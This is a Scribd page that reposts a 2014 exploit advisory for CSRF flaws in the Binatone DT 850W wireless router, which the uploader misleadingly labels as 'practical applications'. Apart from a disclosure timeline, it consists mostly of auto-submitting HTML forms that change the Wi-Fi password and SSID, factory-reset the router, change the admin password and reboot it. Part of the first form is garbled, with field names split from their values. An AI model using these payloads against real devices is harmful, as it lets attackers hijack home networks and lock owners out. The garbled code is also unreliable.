Scribd Logo
Hochladen

Willkommen bei Scribd!

  • Binatone Wireless Router Applications

    Hochgeladen von

    NihilistThinker
    55 Ansichten3 Seiten
    Binatone's wireless router's practical applications to increase its usability and functionality for public access.

    Copyright

    © © All Rights Reserved

    Verfügbare Formate

    TXT, PDF, TXT oder online auf Scribd lesen

    Stufen Sie dieses Dokument als nützlich ein?

    Sind diese Inhalte unangemessen?

    Dieses Dokument melden
    Binatone's wireless router's practical applications to increase its usability and functionality for public access.

    Copyright:

    © All Rights Reserved
    Als TXT, PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    55 Ansichten3 Seiten

    Binatone Wireless Router Applications

    Hochgeladen von

    NihilistThinker
    Binatone's wireless router's practical applications to increase its usability and functionality for public access.

    Copyright:

    © All Rights Reserved
    Als TXT, PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    von 3

    Material's title: Binatone DT 850W Wireless Router - Multiple CSRF Vulnerabiliti

    es
    Category: web applications
    Platform: hardware
    # Exploit Title: Binatone DT 850W Wireless Router - Multiple CSRF Vulnerabilitie
    s
    # Date: 05/20/2014
    # Author: Samandeep Singh - SaMaN( @samanL33T )
    # Vendor Homepage:http://www.binatonetelecom.in/4port-adsl2-wifi-router1.html
    # Category: Hardware/Wireless Router
    # Firmware Version: T6W-A1.005 and below
    # Tested on: Binatone DT 850W Wireless Router
    # Patch/ Fix: Vendor has not provided any fix for this yet
    --------------------------------------------------Disclosure Timeline
    ~~~~~~~~~~~~~~~~~~~
    04/23/2014 Contacted Vendor
    04/26/2014 Vendor Replied
    04/26/2014 Vulnerability Explained (No reply received)
    05/04/2014 Vendor notified about full disclosure in 15 days (No reply)
    05/20/2014 Full Disclosure
    Technical Details
    ~~~~~~~~~~~~~~~~~~
    Binatone DT 850W Wireless Router has a Cross Site Request Forgery Vulnerability
    in its Web Console. Attacker can easily change Wireless password, SSId of Wirele
    ss network,Reboot Router, Reset Router,Change Router's Admin Password by si
    mply making the user visit a CSRF link.
    Exploit Code
    ~~~~~~~~~~~~~
    Change Wifi (WPA2/PSK) password & SSID by CSRF
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    <html>
    <body onload="document.form.submit();">
    <form action="http://[TARGET/IP]/Forms/home_wlan_1"
    method="POST" name="form">
    <input type="hidden" name="wlanWEBFlag" value="0&quo
    t;>
    <input type="hidden" name="AccessFlag" value="0&quot
    ;>
    <input type="hidden" name="wlan_APenable" value="1&q
    uot;>
    <input type="hidden" name="Countries_Channels" value=&quo
    t;INDIA">
    <input type="hidden" name="Channel_ID" value="000000
    00">
    <input type="hidden" name="BeaconInterval" value="10
    0">
    <input type="hidden" name="RTSThreshold" value="2347
    ">
    <input type="hidden" name="FragmentThreshold" value=&quot
    ;2346">
    <input type="hidden" name="DTIM" value="1">
    <input type="hidden" name="WirelessMode" value="802.

    11b+g+n">
    <input type="hidden"
    uot;20/40 MHz">
    <input type="hidden"
    ;AUTO">
    <input type="hidden"
    ;>
    <input type="hidden"
    ;2">
    <input type="hidden"
    t;>
    <input type="hidden"
    uot;0">
    <input type="hidden"
    ;>
    <input type="hidden"
    2-PSK">
    <input type="hidden"
    S">
    <input type="hidden"
    SWORD]">
    <input type="hidden"
    0">
    <input type="hidden"
    ;0">
    <input type="hidden"
    quot;>
    <input type="hidden"
    ;0">
    <input type="hidden"
    2">
    </form>
    </body>
    </html>

    name="WLANChannelBandwidth" value=&q
    name="WLANGuardInterval" value=&quot
    name="WLANMCS" value="AUTO&quot
    name="wlan_MBSSIDNumber" value=&quot
    name="WLSSIDIndex" value="1&quo
    name="ESSID_HIDE_Selection" value=&q
    name="ESSID" value="[SSID]&quot
    name="WEP_Selection" value="WPA
    name="TKIP_Selection" value="AE
    name="PreSharedKey" value="[PAS
    name="WPARekeyInter" value="360
    name="WDSMode_Selection" value=&quot
    name="WLAN_FltActive" value="0&
    name="wlanRadiusWEPFlag" value=&quot
    name="MBSSIDSwitchFlag" value="

    Factory Reset Router Settings by CSRF


    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    <html>
    <body onload="document.form.submit();">
    <form action="http://TARGET/IP]Forms/tools_system_1"
    method="POST" name="form">
    <input type="hidden" name="restoreFlag" value="1&quo
    t;>
    </form>
    </body>
    </html>
    Change Router's Admin Password by CSRF
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    <html>
    <body onload="document.form.submit();">
    <form action="http://[TARGET/IP]/Forms/tools_admin_1"
    method="POST" name="form">
    <input type="hidden" name="uiViewTools_Password" value=&q
    uot;[PASSWORD]">
    <input type="hidden" name="uiViewTools_PasswordConfirm" v
    alue="[PASSWORD]">

    </form>
    </body>
    </html>
    Restart Router by CSRF
    ~~~~~~~~~~~~~~~~~~~~~~
    <html>
    <body onload="document.form.submit();">
    <form action="http://TARGET/IP]/Forms/tools_system_1"
    method="POST" name="form">
    <input type="hidden" name="restoreFlag" value="0&quo
    t;>
    </form>
    </body>
    </html>
    # 1337day.com @ http://1337day.com/

    Das könnte Ihnen auch gefallen